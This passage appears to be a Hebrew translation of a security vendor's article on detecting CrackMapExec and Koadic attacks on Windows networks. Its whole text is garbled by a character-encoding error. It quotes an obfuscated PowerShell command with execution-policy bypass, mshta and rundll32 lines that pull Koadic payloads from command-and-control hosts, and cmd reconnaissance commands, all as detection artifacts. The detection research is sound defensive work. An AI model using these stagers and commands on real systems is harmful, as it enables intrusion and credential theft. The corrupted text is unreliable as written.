ื›ื“ื™ ืœืจื•ืฅ ืขืœ ื”ืžื—ืฉื‘ ืฉืœ ื”ืงื•ืจื‘ืŸ, ื”ืžื•ื“ื•ืœ ื™ื•ืฆืจ ืžืฉื™ืžื” ื‘ืืžืฆืขื•ืช ATSVC ื•-SMB. ATSVC ื”ื•ื ืžืžืฉืง ืœืขื‘ื•ื“ื” ืขื ืžืชื–ืžืŸ ื”ืžืฉื™ืžื•ืช ืฉืœ Windows. CME ืžืฉืชืžืฉ ื‘ืคื•ื ืงืฆื™ื™ืช NetrJobAdd(1) ืฉืœื” ื›ื“ื™ ืœื™ืฆื•ืจ ืžืฉื™ืžื•ืช ื“ืจืš ื”ืจืฉืช. ื“ื•ื’ืžื” ืœืžื” ืฉืžื•ื“ื•ืœ CME ืฉื•ืœื— ืžื•ืฆื’ืช ื‘ืื™ื•ืจ. 7: ื–ื•ื”ื™ ืงืจื™ืืช ืคืงื•ื“ื” cmd.exe ื•ืงื•ื“ ืžืขื•ืจืคืœ ื‘ืฆื•ืจื” ืฉืœ ืืจื’ื•ืžื ื˜ื™ื ื‘ืคื•ืจืžื˜ XML.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื™ื•ืจ.7. ื™ืฆื™ืจืช ืžืฉื™ืžื” ื‘ืืžืฆืขื•ืช CME

ืœืื—ืจ ืฉื”ืžืฉื™ืžื” ื”ื•ื’ืฉื” ืœื‘ื™ืฆื•ืข, ื”ืžื›ื•ื ื” ืฉืœ ื”ืงื•ืจื‘ืŸ ืžืคืขื™ืœื” ืืช Bloodhound ื‘ืขืฆืžื”, ื•ื ื™ืชืŸ ืœืจืื•ืช ื–ืืช ื‘ืชื ื•ืขื”. ื”ืžื•ื“ื•ืœ ืžืื•ืคื™ื™ืŸ ื‘ืฉืื™ืœืชื•ืช LDAP ืœื”ืฉื’ืช ืงื‘ื•ืฆื•ืช ืกื˜ื ื“ืจื˜ื™ื•ืช, ืจืฉื™ืžื” ืฉืœ ื›ืœ ื”ืžื›ื•ื ื•ืช ื•ื”ืžืฉืชืžืฉื™ื ื‘ื“ื•ืžื™ื™ืŸ, ื•ืงื‘ืœืช ืžื™ื“ืข ืขืœ ื”ืคืขืœื•ืช ืžืฉืชืžืฉ ืคืขื™ืœื•ืช ื‘ืืžืฆืขื•ืช ื‘ืงืฉืช SRVSVC NetSessEnum.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 8. ื”ืฉื’ืช ืจืฉื™ืžื” ืฉืœ ื”ืคืขืœื•ืช ืคืขื™ืœื•ืช ื‘ืืžืฆืขื•ืช SMB

ื‘ื ื•ืกืฃ, ื”ืฉืงืช Bloodhound ื‘ืžื›ื•ื ื” ืฉืœ ืงื•ืจื‘ืŸ ืขื ืื•ื“ื™ื˜ื™ื ื’ ืžื•ืคืขืœืช ืžืœื•ื•ื” ื‘ืื™ืจื•ืข ืขื ืžื–ื”ื” 4688 (ื™ืฆื™ืจืช ืชื”ืœื™ืš) ื•ืฉื ื”ืชื”ืœื™ืš ยซC:WindowsSystem32cmd.exeยป. ืžื” ืฉื‘ื•ืœื˜ ื‘ื• ื”ื ื”ื˜ื™ืขื•ื ื™ื ืฉืœ ืฉื•ืจืช ื”ืคืงื•ื“ื”:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โ€ฆ , 40,41 )-jOIN'' ) "

Enum_avproducts

ืžื•ื“ื•ืœ enum_avproducts ืžืขื ื™ื™ืŸ ืžืื•ื“ ืžื ืงื•ื“ืช ืžื‘ื˜ ืฉืœ ืคื•ื ืงืฆื™ื•ื ืœื™ื•ืช ื•ื™ื™ืฉื•ื. WMI ืžืืคืฉืจ ืœืš ืœื”ืฉืชืžืฉ ื‘ืฉืคืช ื”ืฉืื™ืœืชื” WQL ื›ื“ื™ ืœืื—ื–ืจ ื ืชื•ื ื™ื ืžืื•ื‘ื™ื™ืงื˜ื™ื ืฉื•ื ื™ื ืฉืœ Windows, ื•ื–ื” ื‘ืขืฆื ืžื” ืฉืžื•ื“ื•ืœ CME ื–ื” ืžืฉืชืžืฉ ื‘ื•. ื”ื•ื ืžื™ื™ืฆืจ ืฉืื™ืœืชื•ืช ืœืžื—ืœืงื•ืช AntiSpywareProduct ื•- AntiะœirusProduct ืœื’ื‘ื™ ื›ืœื™ ื”ื”ื’ื ื” ื”ืžื•ืชืงื ื™ื ื‘ืžื—ืฉื‘ ืฉืœ ื”ืงื•ืจื‘ืŸ. ืขืœ ืžื ืช ืœื”ืฉื™ื’ ืืช ื”ื ืชื•ื ื™ื ื”ื“ืจื•ืฉื™ื, ื”ืžื•ื“ื•ืœ ืžืชื—ื‘ืจ ืœืžืจื—ื‘ ื”ืฉืžื•ืช rootSecurityCenter2, ื•ืื– ื™ื•ืฆืจ ืฉืื™ืœืชืช WQL ื•ืžืงื‘ืœ ืชื’ื•ื‘ื”. ื‘ืื™ื•ืจ. ืื™ื•ืจ 9 ืžืฆื™ื’ ืืช ื”ืชื•ื›ืŸ ืฉืœ ื‘ืงืฉื•ืช ื•ืชื’ื•ื‘ื•ืช ื›ืืœื”. ื‘ื“ื•ื’ืžื” ืฉืœื ื•, Windows Defender ื ืžืฆื.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 9. ืคืขื™ืœื•ืช ืจืฉืช ืฉืœ ืžื•ื“ื•ืœ enum_avproducts

ืœืขืชื™ื ืงืจื•ื‘ื•ืช, ื‘ื™ืงื•ืจืช WMI (Trace WMI-Activity), ืฉื‘ืื™ืจื•ืขื™ื ืฉืœื” ืชื•ื›ืœ ืœืžืฆื•ื ืžื™ื“ืข ืฉื™ืžื•ืฉื™ ืขืœ ืฉืื™ืœืชื•ืช WQL, ืขืฉื•ื™ื” ืœื”ื™ื•ืช ืžื•ืฉื‘ืชืช. ืื‘ืœ ืื ื–ื” ืžื•ืคืขืœ, ืื– ืื ื”ืกืงืจื™ืคื˜ enum_avproducts ืžื•ืคืขืœ, ื™ื™ืฉืžืจ ืื™ืจื•ืข ืขื ืžื–ื”ื” 11. ื”ื•ื ื™ื›ื™ืœ ืืช ืฉื ื”ืžืฉืชืžืฉ ืฉืฉืœื— ืืช ื”ื‘ืงืฉื” ื•ืืช ื”ืฉื ื‘ืžืจื—ื‘ ื”ืฉืžื•ืช rootSecurityCenter2.

ืœื›ืœ ืื—ื“ ืžืžื•ื“ื•ืœื™ ื”-CME ื”ื™ื• ื—ืคืฆื™ื ืžืฉืœื•, ื‘ื™ืŸ ืื ื–ื” ืฉืื™ืœืชื•ืช WQL ืกืคืฆื™ืคื™ื•ืช ืื• ื™ืฆื™ืจื” ืฉืœ ืกื•ื’ ืžืกื•ื™ื ืฉืœ ืžื˜ืœื•ืช ื‘ืžืชื–ืžืŸ ืžืฉื™ืžื•ืช ืขื ืขืจืคื•ืœ ื•ืคืขื™ืœื•ืช ืกืคืฆื™ืคื™ืช ืœ-Bloodhound ื‘-LDAP ื•-SMB.

KOADIC

ืžืืคื™ื™ืŸ ื™ื™ื—ื•ื“ื™ ืฉืœ Koadic ื”ื•ื ื”ืฉื™ืžื•ืฉ ื‘ืžืคืจืฉื™ JavaScript ื•-VBScript ื”ืžื•ื‘ื ื™ื ื‘-Windows. ื‘ืžื•ื‘ืŸ ื–ื”, ื”ื•ื ืขื•ืงื‘ ืื—ืจ ืžื’ืžืช ื”ื—ื™ื™ื ืžื—ื•ืฅ ืœืื“ืžื” - ื›ืœื•ืžืจ, ืื™ืŸ ืœื• ืชืœื•ืช ื—ื™ืฆื•ื ื™ืช ื•ืžืฉืชืžืฉ ื‘ื›ืœื™ Windows ืกื˜ื ื“ืจื˜ื™ื™ื. ื–ื”ื• ื›ืœื™ ืœืฉืœื™ื˜ื” ื•ื‘ืงืจื” ืžืœืื” (CnC), ืฉื›ืŸ ืœืื—ืจ ื”ื”ื“ื‘ืงื” ืžื•ืชืงืŸ "ืฉืชืœ" ืขืœ ื”ืžื›ื•ื ื”, ื”ืžืืคืฉืจ ืœืฉืœื•ื˜ ื‘ื”. ืžื›ื•ื ื” ื›ื–ื•, ื‘ื˜ืจืžื™ื ื•ืœื•ื’ื™ื” ืงื•ืื“ื™ืช, ื ืงืจืืช "ื–ื•ืžื‘ื™". ืื ืื™ืŸ ืžืกืคื™ืง ื”ืจืฉืื•ืช ืœืชืคืขื•ืœ ืžืœื ื‘ืฆื“ ืฉืœ ื”ืงื•ืจื‘ืŸ, ืœ-Koadic ื™ืฉ ืืช ื”ื™ื›ื•ืœืช ืœื”ืขืœื•ืช ืื•ืชืŸ ื‘ืืžืฆืขื•ืช ื˜ื›ื ื™ืงื•ืช ืžืขืงืฃ ืฉืœ ื‘ืงืจืช ืžืฉืชืžืฉ (UAC bypass).

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 10. Koadic Shell

ืขืœ ื”ื ืคื’ืข ืœื™ื–ื•ื ืชืงืฉื•ืจืช ืขื ืฉืจืช ื”ืคื™ืงื•ื“ ื•ื”ื‘ืงืจื”. ื›ื“ื™ ืœืขืฉื•ืช ื–ืืช, ื”ื™ื ืฆืจื™ื›ื” ืœื™ืฆื•ืจ ืงืฉืจ ืขื URI ืฉื”ื•ื›ืŸ ืงื•ื“ื ื•ืœืงื‘ืœ ืืช ื”ื’ื•ืฃ Koadic ื”ืจืืฉื™ ื‘ืืžืฆืขื•ืช ืื—ื“ ืžื”ืกื˜ื™ื™ื’'ืจื™ื. ื‘ืื™ื•ืจ. ืื™ื•ืจ 11 ืžืฆื™ื’ ื“ื•ื’ืžื” ืœ-mshta stager.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 11. ืืชื—ื•ืœ ื”ืคืขืœื” ืขื ืฉืจืช CnC

ื‘ื”ืชื‘ืกืก ืขืœ ืžืฉืชื ื” ื”ืชื’ื•ื‘ื” WS, ืžืชื‘ืจืจ ืฉื”ื‘ื™ืฆื•ืข ืžืชืจื—ืฉ ื“ืจืš WScript.Shell, ื•ื”ืžืฉืชื ื™ื STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ืžื›ื™ืœื™ื ืžื™ื“ืข ืžืคืชื— ืขืœ ื”ืคืจืžื˜ืจื™ื ืฉืœ ื”ื”ืคืขืœื” ื”ื ื•ื›ื—ื™ืช. ื–ื”ื• ืฆืžื“ ื”ื‘ืงืฉื”-ืชื’ื•ื‘ื” ื”ืจืืฉื•ืŸ ื‘ื—ื™ื‘ื•ืจ HTTP ืขื ืฉืจืช CnC. ื‘ืงืฉื•ืช ืขื•ืงื‘ื•ืช ืงืฉื•ืจื•ืช ื™ืฉื™ืจื•ืช ืœืคื•ื ืงืฆื™ื•ื ืœื™ื•ืช ืฉืœ ื”ืžื•ื“ื•ืœื™ื ื”ื ืงืจืื™ื (ืฉืชืœื™ื). ื›ืœ ื”ืžื•ื“ื•ืœื™ื ืฉืœ Koadic ืขื•ื‘ื“ื™ื ืจืง ืขื ื”ืคืขืœื” ืคืขื™ืœื” ืขื CnC.

ืžื™ืžื™ืงืฅ

ื‘ื“ื™ื•ืง ื›ืžื• ืฉ-CME ืขื•ื‘ื“ ืขื Bloodhound, Koadic ืขื•ื‘ื“ ืขื Mimikatz ื›ืชื•ื›ื ื™ืช ื ืคืจื“ืช ื•ื™ืฉ ืœื” ืžืกืคืจ ื“ืจื›ื™ื ืœื”ืฉื™ืง ืื•ืชื”. ืœื”ืœืŸ ืฆืžื“ ื‘ืงืฉื”-ืชื’ื•ื‘ื” ืœื”ื•ืจื“ืช ืฉืชืœ Mimikatz.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 12. ื”ืขื‘ืจ ืืช ืžื™ืžื™ืงืฅ ืœืงื•ืื“ื™ืฅ'

ืืชื” ื™ื›ื•ืœ ืœืจืื•ืช ื›ื™ืฆื“ ื”ืฉืชื ื” ืคื•ืจืžื˜ URI ื‘ื‘ืงืฉื”. ื›ืขืช ื”ื•ื ืžื›ื™ืœ ืขืจืš ืขื‘ื•ืจ ื”ืžืฉืชื ื” csrf, ืฉืื—ืจืื™ ืœืžื•ื“ื•ืœ ืฉื ื‘ื—ืจ. ืืœ ืชืฉื™ื ืœื‘ ืœืฉืžื”; ื›ื•ืœื ื• ื™ื•ื“ืขื™ื ืฉ-CSRF ืžื•ื‘ืŸ ื‘ื“ืจืš ื›ืœืœ ืื—ืจืช. ื”ืชื’ื•ื‘ื” ื”ื™ื™ืชื” ืื•ืชื• ื’ื•ืฃ ืขื™ืงืจื™ ืฉืœ Koadic, ืฉืืœื™ื• ื ื•ืกืฃ ืงื•ื“ ื”ืงืฉื•ืจ ืœืžื™ืžื™ืงืฅ. ื”ื•ื ื“ื™ ื’ื“ื•ืœ, ืื– ื‘ื•ืื• ื ืกืชื›ืœ ืขืœ ื ืงื•ื“ื•ืช ื”ืžืคืชื—. ื›ืืŸ ื™ืฉ ืœื ื• ืืช ืกืคืจื™ื™ืช Mimikatz ืžืงื•ื“ื“ืช ื‘-base64, ืžื—ืœืงื” NET ืžืกื•ื“ืจืช ืฉืชื—ื“ื™ืจ ืื•ืชื”, ื•ื˜ื™ืขื•ื ื™ื ืœื”ืคืขืœืช Mimikatz. ืชื•ืฆืืช ื”ื‘ื™ืฆื•ืข ืžื•ืขื‘ืจืช ื‘ืจืฉืช ื‘ื˜ืงืกื˜ ื‘ืจื•ืจ.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 13. ืชื•ืฆืื” ืฉืœ ื”ืคืขืœืช Mimikatz ืขืœ ืžื›ื•ื ื” ืžืจื•ื—ืงืช

Exec_cmd

ืœ-Koadic ื™ืฉ ื’ื ืžื•ื“ื•ืœื™ื ืฉื™ื›ื•ืœื™ื ืœื‘ืฆืข ืคืงื•ื“ื•ืช ืžืจื—ื•ืง. ื›ืืŸ ื ืจืื” ืืช ืื•ืชื” ืฉื™ื˜ืช ื™ืฆื™ืจืช URI ื•ืืช ืžืฉืชื ื™ ื”-sid ื•ื”-csrf ื”ืžื•ื›ืจื™ื. ื‘ืžืงืจื” ืฉืœ ืžื•ื“ื•ืœ exec_cmd, ื ื•ืกืฃ ืงื•ื“ ืœื’ื•ืฃ ื”ืžืกื•ื’ืœ ืœื‘ืฆืข ืคืงื•ื“ื•ืช ืžืขื˜ืคืช. ืœื”ืœืŸ ืžื•ืฆื’ ืงื•ื“ ื›ื–ื” ื”ื›ืœื•ืœ ื‘ืชื’ื•ื‘ืช HTTP ืฉืœ ืฉืจืช CnC.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 14. ืงื•ื“ ื”ืฉืชืœื” exec_cmd

ื”ืžืฉืชื ื” GAWTUUGCFI ืขื ืชื›ื•ื ืช WS ื”ืžื•ื›ืจืช ื ื“ืจืฉ ืœื‘ื™ืฆื•ืข ืงื•ื“. ื‘ืขื–ืจืชื•, ื”ืฉืชืœ ืงื•ืจื ืœืžืขื˜ืคืช, ื•ืžืขื‘ื“ ืฉื ื™ ืขื ืคื™ ืงื•ื“ - shell.exec ืขื ื”ื—ื–ืจืช ื–ืจื ื”ื ืชื•ื ื™ื ื”ืคืœื˜ ื•-shell.run ืžื‘ืœื™ ืœื—ื–ื•ืจ.

Koadic ืื™ื ื• ื›ืœื™ ื˜ื™ืคื•ืกื™, ืืš ื™ืฉ ืœื• ื—ืคืฆื™ื ืžืฉืœื• ืฉื‘ืืžืฆืขื•ืชื ื ื™ืชืŸ ืœืžืฆื•ื ืื•ืชื• ื‘ืชื ื•ืขื” ืœื’ื™ื˜ื™ืžื™ืช:

  • ื”ื™ื•ื•ืฆืจื•ืช ืžื™ื•ื—ื“ืช ืฉืœ ื‘ืงืฉื•ืช HTTP,
  • ื‘ืืžืฆืขื•ืช winHttpRequests API,
  • ื™ืฆื™ืจืช ืื•ื‘ื™ื™ืงื˜ WScript.Shell ื‘ืืžืฆืขื•ืช ActiveXObject,
  • ื’ื•ืฃ ื’ื“ื•ืœ ืœื‘ื™ืฆื•ืข.

ื”ื—ื™ื‘ื•ืจ ื”ืจืืฉื•ื ื™ ืžืชื‘ืฆืข ืขืœ ื™ื“ื™ ื”-stageer, ื›ืš ืฉื ื™ืชืŸ ืœื–ื”ื•ืช ืืช ืคืขื™ืœื•ืชื• ื“ืจืš ืื™ืจื•ืขื™ Windows. ืขื‘ื•ืจ mshta, ื–ื”ื• ืื™ืจื•ืข 4688, ื”ืžืฆื™ื™ืŸ ื™ืฆื™ืจืช ืชื”ืœื™ืš ืขื ืชื›ื•ื ืช ื”ื”ืชื—ืœื”:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

ื‘ื–ืžืŸ ืฉ-Koadic ืคื•ืขืœ, ืืชื” ื™ื›ื•ืœ ืœืจืื•ืช ืื™ืจื•ืขื™ื ืื—ืจื™ื ืฉืœ 4688 ืขื ืชื›ื•ื ื•ืช ื”ืžืืคื™ื™ื ื•ืช ืื•ืชื• ื‘ืฆื•ืจื” ืžื•ืฉืœืžืช:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ืžืžืฆืื™ื

ื˜ืจื ื“ ื”ื—ื™ื™ื ืžื”ืงืจืงืข ืฆื•ื‘ืจ ืคื•ืคื•ืœืจื™ื•ืช ื‘ืงืจื‘ ืคื•ืฉืขื™ื. ื”ื ืžืฉืชืžืฉื™ื ื‘ื›ืœื™ื ื•ื‘ืžื ื’ื ื•ื ื™ื ื”ืžื•ื‘ื ื™ื ื‘-Windows ืœืฆืจื›ื™ื”ื. ืื ื• ืจื•ืื™ื ื›ืœื™ื ืคื•ืคื•ืœืจื™ื™ื Koadic, CrackMapExec ื•-Impacket ื”ืขื•ืงื‘ื™ื ืื—ืจ ืขื™ืงืจื•ืŸ ื–ื” ืžื•ืคื™ืขื™ื ื™ื•ืชืจ ื•ื™ื•ืชืจ ื‘ื“ื•ื—ื•ืช APT. ื’ื ืžืกืคืจ ื”ืžื–ืœื’ื™ื ื‘-GitHub ืขื‘ื•ืจ ื”ื›ืœื™ื ื”ืœืœื• ื”ื•ืœืš ื•ื’ื“ืœ, ื•ืฆืฆื™ื ื—ื“ืฉื™ื (ื›ื‘ืจ ื™ืฉ ื›ืืœืฃ ื›ืืœื” ืขื›ืฉื™ื•). ื”ื˜ืจื ื“ ืฆื•ื‘ืจ ืคื•ืคื•ืœืจื™ื•ืช ื‘ืฉืœ ื”ืคืฉื˜ื•ืช ืฉืœื•: ื”ืชื•ืงืคื™ื ืื™ื ื ื–ืงื•ืงื™ื ืœื›ืœื™ ืฆื“ ืฉืœื™ืฉื™; ื”ื ื›ื‘ืจ ื ืžืฆืื™ื ืขืœ ื”ืžื—ืฉื‘ื™ื ืฉืœ ื”ืงื•ืจื‘ื ื•ืช ื•ืขื•ื–ืจื™ื ืœื”ื ืœืขืงื•ืฃ ืืžืฆืขื™ ืื‘ื˜ื—ื”. ืื ื• ืžืชืžืงื“ื™ื ื‘ืœื™ืžื•ื“ ืชืงืฉื•ืจืช ืจืฉืช: ื›ืœ ื›ืœื™ ืฉืชื•ืืจ ืœืขื™ืœ ืžืฉืื™ืจ ืขืงื‘ื•ืช ืžืฉืœื• ื‘ืชืขื‘ื•ืจืช ื”ืจืฉืช; ืžื—ืงืจ ืžืคื•ืจื˜ ืฉืœื”ื ืืคืฉืจ ืœื ื• ืœืœืžื“ ืืช ื”ืžื•ืฆืจ ืฉืœื ื• ื’ื™ืœื•ื™ ื”ืชืงืคื•ืช ืจืฉืช PT ืœื–ื”ื•ืช ืื•ืชื, ืžื” ืฉืขื•ื–ืจ ื‘ืกื•ืคื• ืฉืœ ื“ื‘ืจ ืœื—ืงื•ืจ ืืช ื›ืœ ืฉืจืฉืจืช ืื™ืจื•ืขื™ ื”ืกื™ื™ื‘ืจ ื”ืžืขื•ืจื‘ื™ื ื‘ื”ื.

ืžื—ื‘ืจื™ื:

  • ืื ื˜ื•ืŸ ื˜ื™ื•ืจื™ืŸ, ืจืืฉ ืžื—ืœืงืช ืฉื™ืจื•ืชื™ ืžื•ืžื—ื™ื, ืžืจื›ื– ืื‘ื˜ื—ืช ืžื•ืžื—ื” PT, ื˜ื›ื ื•ืœื•ื’ื™ื•ืช ื—ื™ื•ื‘ื™ื•ืช
  • ืื’ื•ืจ ืคื•ื“ืžื•ืงื•ื‘, ืžื•ืžื—ื”, ืžืจื›ื– ืื‘ื˜ื—ืช ืžื•ืžื—ื” PT, ื˜ื›ื ื•ืœื•ื’ื™ื•ืช ื—ื™ื•ื‘ื™ื•ืช

ืžืงื•ืจ: www.habr.com

ื”ื•ืกืคืช ืชื’ื•ื‘ื”